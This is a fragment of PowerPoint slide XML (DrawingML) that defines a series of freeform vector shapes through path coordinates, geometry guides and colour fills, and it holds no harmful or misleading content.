              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="6253" y="428"/>
                  <a:ext cx="501" cy="200"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 57 w 439"/>
                    <a:gd name="T1" fmla="*/ 0 h 175"/>
                    <a:gd name="T2" fmla="*/ 56 w 439"/>
                    <a:gd name="T3" fmla="*/ 0 h 175"/>
                    <a:gd name="T4" fmla="*/ 0 w 439"/>
                    <a:gd name="T5" fmla="*/ 73 h 175"/>
                    <a:gd name="T6" fmla="*/ 379 w 439"/>
                    <a:gd name="T7" fmla="*/ 175 h 175"/>
                    <a:gd name="T8" fmla="*/ 439 w 439"/>
                    <a:gd name="T9" fmla="*/ 103 h 175"/>
                    <a:gd name="T10" fmla="*/ 57 w 439"/>
                    <a:gd name="T11" fmla="*/ 0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39" h="175">
                      <a:moveTo>
                        <a:pt x="57" y="0"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="56" y="0"/>
                        <a:pt x="56" y="0"/>
                        <a:pt x="56" y="0"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="25" y="9"/>
                        <a:pt x="0" y="42"/>
                        <a:pt x="0" y="73"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="379" y="175"/>
                        <a:pt x="379" y="175"/>
                        <a:pt x="379" y="175"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="439" y="103"/>
                        <a:pt x="439" y="103"/>
                        <a:pt x="439" y="103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 938"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="7275" y="395"/>
                  <a:ext cx="67" cy="102"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 58 w 59"/>
                    <a:gd name="T1" fmla="*/ 50 h 89"/>
                    <a:gd name="T2" fmla="*/ 1 w 59"/>
                    <a:gd name="T3" fmla="*/ 9 h 89"/>
                    <a:gd name="T4" fmla="*/ 34 w 59"/>
                    <a:gd name="T5" fmla="*/ 56 h 89"/>
                    <a:gd name="T6" fmla="*/ 58 w 59"/>
                    <a:gd name="T7" fmla="*/ 89 h 89"/>
                    <a:gd name="T8" fmla="*/ 58 w 59"/>
                    <a:gd name="T9" fmla="*/ 50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89">
                      <a:moveTo>
                        <a:pt x="58" y="50"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="58" y="18"/>
                        <a:pt x="32" y="0"/>
                        <a:pt x="1" y="9"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="9"/>
                        <a:pt x="18" y="34"/>
                        <a:pt x="34" y="56"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="47" y="74"/>
                        <a:pt x="58" y="89"/>
                        <a:pt x="58" y="89"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="59" y="77"/>
                        <a:pt x="59" y="62"/>
                        <a:pt x="58" y="5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3" name="Freeform 939"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="6751" y="405"/>
                  <a:ext cx="590" cy="230"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 460 w 517"/>
                    <a:gd name="T1" fmla="*/ 0 h 201"/>
                    <a:gd name="T2" fmla="*/ 460 w 517"/>
                    <a:gd name="T3" fmla="*/ 0 h 201"/>
                    <a:gd name="T4" fmla="*/ 0 w 517"/>
                    <a:gd name="T5" fmla="*/ 121 h 201"/>
                    <a:gd name="T6" fmla="*/ 56 w 517"/>
                    <a:gd name="T7" fmla="*/ 201 h 201"/>
                    <a:gd name="T8" fmla="*/ 517 w 517"/>
                    <a:gd name="T9" fmla="*/ 80 h 201"/>
                    <a:gd name="T10" fmla="*/ 460 w 517"/>
                    <a:gd name="T11" fmla="*/ 0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17" h="201">
                      <a:moveTo>
                        <a:pt x="460" y="0"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="460" y="0"/>
                        <a:pt x="460" y="0"/>
                        <a:pt x="460" y="0"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="121"/>
                        <a:pt x="0" y="121"/>
                        <a:pt x="0" y="121"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="56" y="201"/>
                        <a:pt x="56" y="201"/>
                        <a:pt x="56" y="201"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="517" y="80"/>
                        <a:pt x="517" y="80"/>
                        <a:pt x="517" y="80"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="517" y="49"/>
                        <a:pt x="492" y="9"/>
                        <a:pt x="46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4" name="Freeform 940"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="6685" y="544"/>
                  <a:ext cx="129" cy="105"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 105 w 113"/>
                    <a:gd name="T1" fmla="*/ 46 h 92"/>
                    <a:gd name="T2" fmla="*/ 57 w 113"/>
                    <a:gd name="T3" fmla="*/ 0 h 92"/>
                    <a:gd name="T4" fmla="*/ 57 w 113"/>
                    <a:gd name="T5" fmla="*/ 0 h 92"/>
                    <a:gd name="T6" fmla="*/ 56 w 113"/>
                    <a:gd name="T7" fmla="*/ 0 h 92"/>
                    <a:gd name="T8" fmla="*/ 0 w 113"/>
                    <a:gd name="T9" fmla="*/ 74 h 92"/>
                    <a:gd name="T10" fmla="*/ 113 w 113"/>
                    <a:gd name="T11" fmla="*/ 80 h 92"/>
                    <a:gd name="T12" fmla="*/ 105 w 113"/>
                    <a:gd name="T13" fmla="*/ 46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3" h="92">
                      <a:moveTo>
                        <a:pt x="105" y="46"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="95" y="25"/>
                        <a:pt x="77" y="6"/>
                        <a:pt x="57" y="0"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="57" y="0"/>
                        <a:pt x="57" y="0"/>
                        <a:pt x="57" y="0"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="56" y="0"/>
                        <a:pt x="56" y="0"/>
                        <a:pt x="56" y="0"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="25" y="9"/>
                        <a:pt x="0" y="42"/>
                        <a:pt x="0" y="74"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="26" y="92"/>
                        <a:pt x="82" y="88"/>
                        <a:pt x="113" y="80"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="113" y="69"/>
                        <a:pt x="110" y="57"/>
                        <a:pt x="105" y="4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5" name="Freeform 941"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="6625" y="1304"/>
                  <a:ext cx="346" cy="380"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 241 w 303"/>
                    <a:gd name="T1" fmla="*/ 97 h 333"/>
                    <a:gd name="T2" fmla="*/ 66 w 303"/>
                    <a:gd name="T3" fmla="*/ 21 h 333"/>
                    <a:gd name="T4" fmla="*/ 66 w 303"/>
                    <a:gd name="T5" fmla="*/ 21 h 333"/>
                    <a:gd name="T6" fmla="*/ 17 w 303"/>
                    <a:gd name="T7" fmla="*/ 34 h 333"/>
                    <a:gd name="T8" fmla="*/ 27 w 303"/>
                    <a:gd name="T9" fmla="*/ 55 h 333"/>
                    <a:gd name="T10" fmla="*/ 58 w 303"/>
                    <a:gd name="T11" fmla="*/ 236 h 333"/>
                    <a:gd name="T12" fmla="*/ 143 w 303"/>
                    <a:gd name="T13" fmla="*/ 305 h 333"/>
                    <a:gd name="T14" fmla="*/ 156 w 303"/>
                    <a:gd name="T15" fmla="*/ 333 h 333"/>
                    <a:gd name="T16" fmla="*/ 221 w 303"/>
                    <a:gd name="T17" fmla="*/ 315 h 333"/>
                    <a:gd name="T18" fmla="*/ 221 w 303"/>
                    <a:gd name="T19" fmla="*/ 315 h 333"/>
                    <a:gd name="T20" fmla="*/ 252 w 303"/>
                    <a:gd name="T21" fmla="*/ 301 h 333"/>
                    <a:gd name="T22" fmla="*/ 241 w 303"/>
                    <a:gd name="T23" fmla="*/ 97 h 3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03" h="333">
                      <a:moveTo>
                        <a:pt x="241" y="97"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="191" y="31"/>
                        <a:pt x="117" y="0"/>
                        <a:pt x="66" y="21"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="66" y="21"/>
                        <a:pt x="66" y="21"/>
                        <a:pt x="66" y="21"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="17" y="34"/>
                        <a:pt x="17" y="34"/>
                        <a:pt x="17" y="34"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="27" y="55"/>
                        <a:pt x="27" y="55"/>
                        <a:pt x="27" y="55"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="100"/>
                        <a:pt x="11" y="174"/>
                        <a:pt x="58" y="236"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="82" y="268"/>
                        <a:pt x="113" y="292"/>
                        <a:pt x="143" y="305"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="156" y="333"/>
                        <a:pt x="156" y="333"/>
                        <a:pt x="156" y="333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32" y="313"/>
                        <a:pt x="243" y="308"/>
                        <a:pt x="252" y="301"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="303" y="262"/>
                        <a:pt x="298" y="171"/>
                        <a:pt x="241" y="97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6" name="Freeform 942"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="6548" y="1315"/>
                  <a:ext cx="350" cy="396"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 255 w 306"/>
                    <a:gd name="T1" fmla="*/ 308 h 346"/>
                    <a:gd name="T2" fmla="*/ 62 w 306"/>
                    <a:gd name="T3" fmla="*/ 243 h 346"/>
                    <a:gd name="T4" fmla="*/ 51 w 306"/>
                    <a:gd name="T5" fmla="*/ 39 h 346"/>
                    <a:gd name="T6" fmla="*/ 245 w 306"/>
                    <a:gd name="T7" fmla="*/ 104 h 346"/>
                    <a:gd name="T8" fmla="*/ 255 w 306"/>
                    <a:gd name="T9" fmla="*/ 308 h 3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6" h="346">
                      <a:moveTo>
                        <a:pt x="255" y="308"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="205" y="346"/>
                        <a:pt x="118" y="317"/>
                        <a:pt x="62" y="243"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="5" y="168"/>
                        <a:pt x="0" y="77"/>
                        <a:pt x="51" y="39"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="101" y="0"/>
                        <a:pt x="188" y="29"/>
                        <a:pt x="245" y="104"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="301" y="178"/>
                        <a:pt x="306" y="269"/>
                        <a:pt x="255" y="308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Freeform 943"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="6617" y="1393"/>
                  <a:ext cx="212" cy="242"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 155 w 186"/>
                    <a:gd name="T1" fmla="*/ 187 h 211"/>
                    <a:gd name="T2" fmla="*/ 37 w 186"/>
                    <a:gd name="T3" fmla="*/ 148 h 211"/>
                    <a:gd name="T4" fmla="*/ 31 w 186"/>
                    <a:gd name="T5" fmla="*/ 23 h 211"/>
                    <a:gd name="T6" fmla="*/ 149 w 186"/>
                    <a:gd name="T7" fmla="*/ 63 h 211"/>
                    <a:gd name="T8" fmla="*/ 155 w 186"/>
                    <a:gd name="T9" fmla="*/ 187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6" h="211">
                      <a:moveTo>
                        <a:pt x="155" y="187"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="125" y="211"/>
                        <a:pt x="72" y="193"/>
                        <a:pt x="37" y="148"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3" y="102"/>
                        <a:pt x="0" y="47"/>
                        <a:pt x="31" y="23"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="62" y="0"/>
                        <a:pt x="115" y="18"/>
                        <a:pt x="149" y="63"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="183" y="108"/>
                        <a:pt x="186" y="164"/>
                        <a:pt x="155" y="18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8" name="Freeform 944"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="6382" y="1230"/>
                  <a:ext cx="630" cy="298"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 535 w 552"/>
                    <a:gd name="T1" fmla="*/ 152 h 261"/>
                    <a:gd name="T2" fmla="*/ 420 w 552"/>
                    <a:gd name="T3" fmla="*/ 52 h 261"/>
                    <a:gd name="T4" fmla="*/ 209 w 552"/>
                    <a:gd name="T5" fmla="*/ 0 h 261"/>
                    <a:gd name="T6" fmla="*/ 26 w 552"/>
                    <a:gd name="T7" fmla="*/ 122 h 261"/>
                    <a:gd name="T8" fmla="*/ 0 w 552"/>
                    <a:gd name="T9" fmla="*/ 210 h 261"/>
                    <a:gd name="T10" fmla="*/ 121 w 552"/>
                    <a:gd name="T11" fmla="*/ 243 h 261"/>
                    <a:gd name="T12" fmla="*/ 121 w 552"/>
                    <a:gd name="T13" fmla="*/ 149 h 261"/>
                    <a:gd name="T14" fmla="*/ 228 w 552"/>
                    <a:gd name="T15" fmla="*/ 49 h 261"/>
                    <a:gd name="T16" fmla="*/ 413 w 552"/>
                    <a:gd name="T17" fmla="*/ 148 h 261"/>
                    <a:gd name="T18" fmla="*/ 465 w 552"/>
                    <a:gd name="T19" fmla="*/ 240 h 261"/>
                    <a:gd name="T20" fmla="*/ 543 w 552"/>
                    <a:gd name="T21" fmla="*/ 261 h 261"/>
                    <a:gd name="T22" fmla="*/ 535 w 552"/>
                    <a:gd name="T23" fmla="*/ 152 h 2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52" h="261">
                      <a:moveTo>
                        <a:pt x="535" y="152"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="526" y="143"/>
                        <a:pt x="438" y="59"/>
                        <a:pt x="420" y="52"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="402" y="46"/>
                        <a:pt x="232" y="0"/>
                        <a:pt x="209" y="0"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="187" y="0"/>
                        <a:pt x="39" y="93"/>
                        <a:pt x="26" y="122"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="19" y="131"/>
                        <a:pt x="6" y="179"/>
                        <a:pt x="0" y="210"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="121" y="243"/>
                        <a:pt x="121" y="243"/>
                        <a:pt x="121" y="243"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="119" y="238"/>
                        <a:pt x="112" y="173"/>
                        <a:pt x="121" y="149"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="130" y="125"/>
                        <a:pt x="136" y="56"/>
                        <a:pt x="228" y="49"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="259" y="46"/>
                        <a:pt x="346" y="64"/>
                        <a:pt x="413" y="148"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="440" y="181"/>
                        <a:pt x="460" y="219"/>
                        <a:pt x="465" y="240"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="543" y="261"/>
                        <a:pt x="543" y="261"/>
                        <a:pt x="543" y="261"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="552" y="230"/>
                        <a:pt x="540" y="156"/>
                        <a:pt x="535" y="152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61B2">
                        <a:gamma/>
                        <a:tint val="60784"/>
                        <a:invGamma/>
                      </a:srgbClr>
                    </a:gs>
                    <a:gs pos="100000">
                      <a:srgbClr val="0061B2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Freeform 945"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="6527" y="152"/>
                  <a:ext cx="869" cy="285"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 1797"/>
                    <a:gd name="T1" fmla="*/ 591 h 591"/>
                    <a:gd name="T2" fmla="*/ 1797 w 1797"/>
                    <a:gd name="T3" fmla="*/ 109 h 591"/>
                    <a:gd name="T4" fmla="*/ 1797 w 1797"/>
                    <a:gd name="T5" fmla="*/ 0 h 591"/>
                    <a:gd name="T6" fmla="*/ 0 w 1797"/>
                    <a:gd name="T7" fmla="*/ 485 h 591"/>
                    <a:gd name="T8" fmla="*/ 0 w 1797"/>
                    <a:gd name="T9" fmla="*/ 591 h 5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97" h="591">
                      <a:moveTo>
                        <a:pt x="0" y="591"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="1797" y="109"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1797" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="485"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="59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0" name="Freeform 946"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="6159" y="285"/>
                  <a:ext cx="368" cy="152"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 761"/>
                    <a:gd name="T1" fmla="*/ 108 h 314"/>
                    <a:gd name="T2" fmla="*/ 761 w 761"/>
                    <a:gd name="T3" fmla="*/ 314 h 314"/>
                    <a:gd name="T4" fmla="*/ 761 w 761"/>
                    <a:gd name="T5" fmla="*/ 208 h 314"/>
                    <a:gd name="T6" fmla="*/ 0 w 761"/>
                    <a:gd name="T7" fmla="*/ 0 h 314"/>
                    <a:gd name="T8" fmla="*/ 0 w 761"/>
                    <a:gd name="T9" fmla="*/ 108 h 3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61" h="314">
                      <a:moveTo>
                        <a:pt x="0" y="108"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="761" y="314"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="761" y="208"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="10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947"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="6159" y="52"/>
                  <a:ext cx="1237" cy="334"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 761 w 2558"/>
                    <a:gd name="T1" fmla="*/ 690 h 690"/>
                    <a:gd name="T2" fmla="*/ 2558 w 2558"/>
                    <a:gd name="T3" fmla="*/ 205 h 690"/>
                    <a:gd name="T4" fmla="*/ 1798 w 2558"/>
                    <a:gd name="T5" fmla="*/ 0 h 690"/>
                    <a:gd name="T6" fmla="*/ 0 w 2558"/>
                    <a:gd name="T7" fmla="*/ 482 h 690"/>
                    <a:gd name="T8" fmla="*/ 761 w 2558"/>
                    <a:gd name="T9" fmla="*/ 690 h 6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58" h="690">
                      <a:moveTo>
                        <a:pt x="761" y="690"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="2558" y="205"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1798" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="482"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="761" y="69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948"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="7020" y="1405"/>
                  <a:ext cx="88" cy="98"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 13 w 77"/>
                    <a:gd name="T1" fmla="*/ 77 h 86"/>
                    <a:gd name="T2" fmla="*/ 61 w 77"/>
                    <a:gd name="T3" fmla="*/ 60 h 86"/>
                    <a:gd name="T4" fmla="*/ 64 w 77"/>
                    <a:gd name="T5" fmla="*/ 9 h 86"/>
                    <a:gd name="T6" fmla="*/ 15 w 77"/>
                    <a:gd name="T7" fmla="*/ 25 h 86"/>
                    <a:gd name="T8" fmla="*/ 13 w 77"/>
                    <a:gd name="T9" fmla="*/ 77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7" h="86">
                      <a:moveTo>
                        <a:pt x="13" y="77"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="25" y="86"/>
                        <a:pt x="47" y="79"/>
                        <a:pt x="61" y="60"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="75" y="42"/>
                        <a:pt x="77" y="19"/>
                        <a:pt x="64" y="9"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="51" y="0"/>
                        <a:pt x="30" y="7"/>
                        <a:pt x="15" y="25"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="1" y="44"/>
                        <a:pt x="0" y="67"/>
                        <a:pt x="13" y="77"/>
                      </a:cubicBezTo>
                      <a:close/>
                    </a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:solidFill>
                  <a:srgbClr val="FFFF99"/>
                </a:soli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949"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="7123" y="1375"/>
                  <a:ext cx="86" cy="100"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 12 w 76"/>
                    <a:gd name="T1" fmla="*/ 77 h 87"/>
                    <a:gd name="T2" fmla="*/ 61 w 76"/>
                    <a:gd name="T3" fmla="*/ 61 h 87"/>
                    <a:gd name="T4" fmla="*/ 64 w 76"/>
                    <a:gd name="T5" fmla="*/ 10 h 87"/>
                    <a:gd name="T6" fmla="*/ 15 w 76"/>
                    <a:gd name="T7" fmla="*/ 26 h 87"/>
                    <a:gd name="T8" fmla="*/ 12 w 76"/>
                    <a:gd name="T9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6" h="87">
                      <a:moveTo>
                        <a:pt x="12" y="77"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="25" y="87"/>
                        <a:pt x="47" y="80"/>
                        <a:pt x="61" y="61"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="75" y="43"/>
                        <a:pt x="76" y="20"/>
                        <a:pt x="64" y="10"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="51" y="0"/>
                        <a:pt x="29" y="8"/>
                        <a:pt x="15" y="26"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="1" y="45"/>
                        <a:pt x="0" y="68"/>
                        <a:pt x="12" y="77"/>
                      </a:cubicBezTo>
                      <a:close/>
                    </a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:solidFill>
                  <a:srgbClr val="FFFF99"/>
                </a:soli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Freeform 950"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="7665" y="1226"/>
                  <a:ext cx="88" cy="100"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 13 w 77"/>
                    <a:gd name="T1" fmla="*/ 77 h 87"/>
                    <a:gd name="T2" fmla="*/ 62 w 77"/>
                    <a:gd name="T3" fmla="*/ 61 h 87"/>
                    <a:gd name="T4" fmla="*/ 64 w 77"/>
                    <a:gd name="T5" fmla="*/ 10 h 87"/>
                    <a:gd name="T6" fmla="*/ 16 w 77"/>
                    <a:gd name="T7" fmla="*/ 26 h 87"/>
                    <a:gd name="T8" fmla="*/ 13 w 77"/>
                    <a:gd name="T9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7" h="87">
                      <a:moveTo>
                        <a:pt x="13" y="77"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="26" y="87"/>
                        <a:pt x="47" y="79"/>
                        <a:pt x="62" y="61"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="76" y="42"/>
                        <a:pt x="77" y="19"/>
                        <a:pt x="64" y="10"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="51" y="0"/>
                        <a:pt x="30" y="7"/>
                        <a:pt x="16" y="26"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="1" y="44"/>
                        <a:pt x="0" y="67"/>
                        <a:pt x="13" y="77"/>
                      </a:cubicBezTo>
                      <a:close/>
                    </a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:solidFill>
                  <a:srgbClr val="FFFF99"/>
                </a:soli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Freeform 951"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="7768" y="1198"/>
                  <a:ext cx="88" cy="100"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 13 w 77"/>
                    <a:gd name="T1" fmla="*/ 77 h 87"/>
                    <a:gd name="T2" fmla="*/ 61 w 77"/>
                    <a:gd name="T3" fmla="*/ 61 h 87"/>
                    <a:gd name="T4" fmla="*/ 64 w 77"/>
                    <a:gd name="T5" fmla="*/ 9 h 87"/>
                    <a:gd name="T6" fmla="*/ 15 w 77"/>
                    <a:gd name="T7" fmla="*/ 26 h 87"/>
                    <a:gd name="T8" fmla="*/ 13 w 77"/>
                    <a:gd name="T9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7" h="87">
                      <a:moveTo>
                        <a:pt x="13" y="77"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="25" y="87"/>
                        <a:pt x="47" y="79"/>
                        <a:pt x="61" y="61"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="75" y="42"/>
                        <a:pt x="77" y="19"/>
                        <a:pt x="64" y="9"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="51" y="0"/>
                        <a:pt x="29" y="7"/>
                        <a:pt x="15" y="26"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="1" y="44"/>
                        <a:pt x="0" y="67"/>
                        <a:pt x="13" y="77"/>
                      </a:cubicBezTo>
                      <a:close/>
                    </a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:solidFill>
                  <a:srgbClr val="FFFF99"/>
                </a:soli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Freeform 952"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="4426" y="-316"/>
                  <a:ext cx="2353" cy="601"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 2060 w 2060"/>
                    <a:gd name="T1" fmla="*/ 380 h 526"/>
                    <a:gd name="T2" fmla="*/ 1728 w 2060"/>
                    <a:gd name="T3" fmla="*/ 268 h 526"/>
                    <a:gd name="T4" fmla="*/ 1516 w 2060"/>
                    <a:gd name="T5" fmla="*/ 248 h 526"/>
                    <a:gd name="T6" fmla="*/ 1279 w 2060"/>
                    <a:gd name="T7" fmla="*/ 168 h 526"/>
                    <a:gd name="T8" fmla="*/ 928 w 2060"/>
                    <a:gd name="T9" fmla="*/ 88 h 526"/>
                    <a:gd name="T10" fmla="*/ 563 w 2060"/>
                    <a:gd name="T11" fmla="*/ 4 h 526"/>
                    <a:gd name="T12" fmla="*/ 275 w 2060"/>
